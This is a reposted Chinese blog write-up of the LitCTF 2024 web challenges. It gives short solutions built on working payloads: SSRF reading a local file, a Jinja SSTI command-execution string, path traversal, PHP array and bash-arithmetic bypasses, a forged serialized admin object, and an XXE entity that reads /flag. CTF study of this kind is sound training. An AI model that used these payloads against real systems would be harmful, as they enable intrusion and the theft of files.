0


【Web】LitCTF 2024 题解(全)

浏览器也能套娃?

随便试一试,一眼ssrf

file:///flag直接读本地文件

一个....池子?

{{7*7}}测出SSTI

随便找个payload打了

{{x.init.globals['builtins']'eval'.popen('tac /f*').read()")}}

高亮主题(划掉)背景查看器

一眼文件包含漏洞

../../../../flag

目录穿越拿到flag

百万美元的诱惑

?a[]=1&b[]=2&c=2025.a

过了php八股

访问./dollar.php

参考ctfshow web57

【Web】CTFSHOW PHP命令执行刷题记录(全)_ctfweb解题 php-CSDN博客

0=$(())

12=$((~$((-13))))

-13=$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))

12=$((~$(($((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))))))

SAS - Serializing Authentication

傻瓜题

<?php

class User {

    public $username;

    public $password;

}

$user=new User();
$user->username='admin';
$user->password='secure_password';
echo base64_encode(serialize($user));
?>

exx

以xml形式传数据,打xxe

直接读文件

<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<user><username>&xxe;</username><password>admin</password></user>

标签: ctf LitCTF nssctf

本文转载自: https://blog.csdn.net/uuzeray/article/details/140687504
版权归原作者 Z3r4y 所有, 如有侵权,请联系我们删除。

“【Web】LitCTF 2024 题解(全)”的评论:

还没有评论